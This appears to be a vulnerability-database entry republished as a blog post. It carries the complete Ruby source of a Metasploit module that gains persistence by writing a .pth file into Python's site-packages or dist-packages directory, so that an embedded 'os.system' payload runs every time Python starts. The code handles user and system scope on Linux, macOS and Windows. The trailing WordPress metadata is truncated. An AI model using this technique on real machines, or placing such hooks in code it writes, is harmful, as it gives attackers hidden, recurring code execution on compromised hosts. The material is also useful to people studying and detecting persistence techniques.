{“lastseen”:”2026-01-07T19:04:51″,”description”:”This module leverages Python’s startup mechanism, where some files can be automically processed during the initialization of the Python interpreter. One of those files are startup hooks site-specific, dist-packages. If these files are present in…”,”published”:”2026-01-07T18:58:55″,”modified”:”2026-01-07T18:58:55″,”type”:”metasploit”,”title”:”Python Site-Specific Hook Persistence”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-PERSISTENCE-PYTHON_SITE_SPECIFIC_HOOK-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ExcellentRanking # https:\/\/docs.metasploit.com\/docs\/using-metasploit\/intermediate\/exploit-ranking.html\\n\\n include Msf::Post::Linux::Priv\\n include Msf::Post::File\\n include Msf::Exploit::EXE\\n include Msf::Exploit::FileDropper\\n include Msf::Exploit::Local::Persistence\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Python Site-Specific Hook Persistence’,\\n ‘Description’ =\\u003e %q{\\n This module leverages Python’s startup mechanism, where some files can be automically processed during the initialization of the Python interpreter. One of those files are startup hooks (site-specific, dist-packages). If these files are present in site-specific or dist-packages directories, any lines beginning with import will be executed automatically. This creates a persistence mechanism, if an attacker has established access to target machine with sufficient permissions.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘msutovsky-r7’, # msf module\\n ],\\n ‘Platform’ =\\u003e [‘linux’, ‘windows’, ‘osx’],\\n ‘Arch’ =\\u003e [ ARCH_CMD ],\\n ‘SessionTypes’ =\\u003e [ ‘meterpreter’, ‘shell’ ],\\n ‘Targets’ =\\u003e [[ ‘Auto’, {} ]],\\n ‘References’ =\\u003e [\\n [ ‘URL’, ‘https:\/\/docs.python.org\/3\/library\/site.html’],\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1546_018_PYTHON_STARTUP_HOOKS],\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2012-09-29’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, SCREEN_EFFECTS]\\n }\\n )\\n )\\n register_options([\\n OptString.new(‘PYTHON_HOOK_PATH’, [false, ‘The path to Python site-specific hook directory’]),\\n OptEnum.new(‘EXECUTION_TARGET’, [true, ‘Selects if persistence is installed under current user or for all users’, ‘USER’, [‘USER’, ‘SYSTEM’]])\\n ])\\n end\\n\\n def get_hooks_path\\n unless datastore[‘PYTHON_HOOK_PATH’].blank?\\n @hooks_path = datastore[‘PYTHON_HOOK_PATH’]\\n return\\n end\\n case session.platform\\n when ‘windows’, ‘win’\\n\\n case datastore[‘EXECUTION_TARGET’]\\n when ‘USER’\\n @hooks_path = expand_path(\\”%USERPROFILE%\/AppData\/Local\/Programs\/Python\/Python#{@python_version.sub(‘.’, ”)}\/Lib\/site-packages\/\\”)\\n when ‘SYSTEM’\\n @hooks_path = \\”C:\/Python#{@python_version.sub(‘.’, ”)}\/Lib\/site-packages\/\\”\\n end\\n when ‘osx’, ‘linux’\\n\\n case datastore[‘EXECUTION_TARGET’]\\n when ‘USER’\\n @hooks_path = expand_path(\\”$HOME\/.local\/lib\/python#{@python_version}\/site-packages\/\\”)\\n when ‘SYSTEM’\\n @hooks_path = \\”\/usr\/local\/lib\/python#{@python_version}\/dist-packages\/\\”\\n end\\n end\\n end\\n\\n def get_python_version\\n case session.platform\\n when ‘windows’, ‘win’\\n cmd_exec(‘cmd.exe \/c python3.exe –version 2\\u003e nul || python2.exe –version 2\\u003e nul || python.exe –version 2\\u003e nul || py.exe –version 2\\u003e nul’) =~ \/(\\\\d+.\\\\d+).\\\\d+\/\\n when ‘osx’, ‘linux’\\n cmd_exec(‘python3 –version 2\\u003e\/dev\/null || python2 –version 2\\u003e \/dev\/null || python –version 2\\u003e\/dev\/null’) =~ \/(\\\\d+.\\\\d+).\\\\d+\/\\n end\\n\\n @python_version = Regexp.last_match(1)\\n end\\n\\n def check\\n get_python_version\\n\\n return CheckCode::Safe(‘Python not present on the system’) unless @python_version\\n\\n CheckCode::Vulnerable(‘Python is present on the system’)\\n end\\n\\n def install_persistence\\n get_python_version unless @python_version\\n print_status(\\”Detected Python version #{@python_version}\\”)\\n get_hooks_path unless @hooks_path\\n\\n mkdir(@hooks_path) if session.platform == ‘osx’ || session.platform == ‘linux’\\n\\n fail_with(Failure::NotFound, \\”The hooks path #{@hooks_path} does not exists\\”) unless directory?(@hooks_path)\\n # check if hooks path writable\\n begin\\n # windows only ps payloads have writable? so try that first\\n fail_with(Failure::NoAccess, \\”No permission to write to #{@hooks_path}\\”) unless writable?(@hooks_path)\\n rescue RuntimeError\\n filename = @hooks_path + ‘\\\\\\\\’ + Rex::Text.rand_text_alpha((rand(6..13)))\\n write_file(filename, ”)\\n fail_with(Failure::NoAccess, \\”No permission to write to #{@hooks_path}\\”) unless exists?(filename)\\n rm_f(filename)\\n end\\n\\n print_status(\\”Got path to site-specific hooks #{@hooks_path}\\”)\\n\\n file_name = datastore[‘PAYLOAD_NAME’] || Rex::Text.rand_text_alpha(5..10)\\n\\n fail_with(Failure::PayloadFailed, ‘Failed to create malicious hook’) unless write_file(\\”#{@hooks_path}#{file_name}.pth\\”, %(import os;os.system(\\”#{payload.encoded}\\”) ))\\n\\n print_good(\\”Successfully created malicious hook #{@hooks_path}#{file_name}.pth\\”)\\n @clean_up_rc \\u003c\\u003c \\”rm #{@hooks_path}#{file_name}.pth\\\\n\\”\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/persistence\/python_site_specific_hook.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/persistence\/python_site_specific_hook\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-07T19:04:51″,”description”:”This module leverages Python’s startup mechanism, where some files can be automically processed during the initialization of the Python interpreter. One of those files are…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-34496","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n